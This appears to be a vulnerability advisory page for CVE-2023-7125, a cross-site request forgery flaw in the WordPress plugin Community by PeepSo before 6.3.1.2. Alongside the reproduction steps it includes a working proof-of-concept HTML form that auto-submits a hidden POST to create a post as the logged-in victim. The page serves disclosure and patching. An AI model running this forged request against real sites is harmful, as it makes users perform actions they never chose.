Lucene search
Bikram KharalWPEX-ID:CAC12B64-ED25-4EE2-933F-8FF722605271HistoryJan 09, 2024 - 12:00 a.m.
Community by PeepSo < 6.3.1.2 - User Post Creation via CSRF
2024-01-0900:00:00
Bikram Kharal
25
peepso community
user post creation
csrf
html form
security exploit
cross-site request forgery
Description The plugin does not have CSRF check when creating a user post (visible on their wall in their profile page), which could allow attackers to make logged in users perform such action via a CSRF attack
1. Log in as a normal user.
2. Save the content below as an HTML file.
<html>
<body>
<form action="https://example.com/peepsoajax/postbox.post" method="POST">
<input type="hidden" name="content" value="testing by bikram
" />
<input type="hidden" name="id" value="2" />
<input type="hidden" name="uid" value="2" />
<input type="hidden" name="acc" value="10" />
<input type="hidden" name="type" value="activity" />
<input type="hidden" name="mood" value="0" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
3. Change the ID and UID value to your account ID.
4. Open the above HTML file and submit it. A new post will be created and can be seen in the profile page (default /profile/)Related
prion
prion
Cross site request forgery (csrf)
2024-01-16 16:15:00
nvd
nvd
CVE-2023-7125
2024-01-16 16:15:14
cve
cve
CVE-2023-7125
2024-01-16 16:15:14
wpvulndb
wpvulndb
Community by PeepSo < 6.3.1.2 - User Post Creation via CSRF
2024-01-09 00:00:00
cvelist
cvelist
CVE-2023-7125 Community by PeepSo < 6.3.1.2 - User Post Creation via CSRF
2024-01-16 15:57:04
6.8 Medium
AI Score
Confidence
Low
0.0005 Low
EPSS
Percentile
17.1%
Related for WPEX-ID:CAC12B64-ED25-4EE2-933F-8FF722605271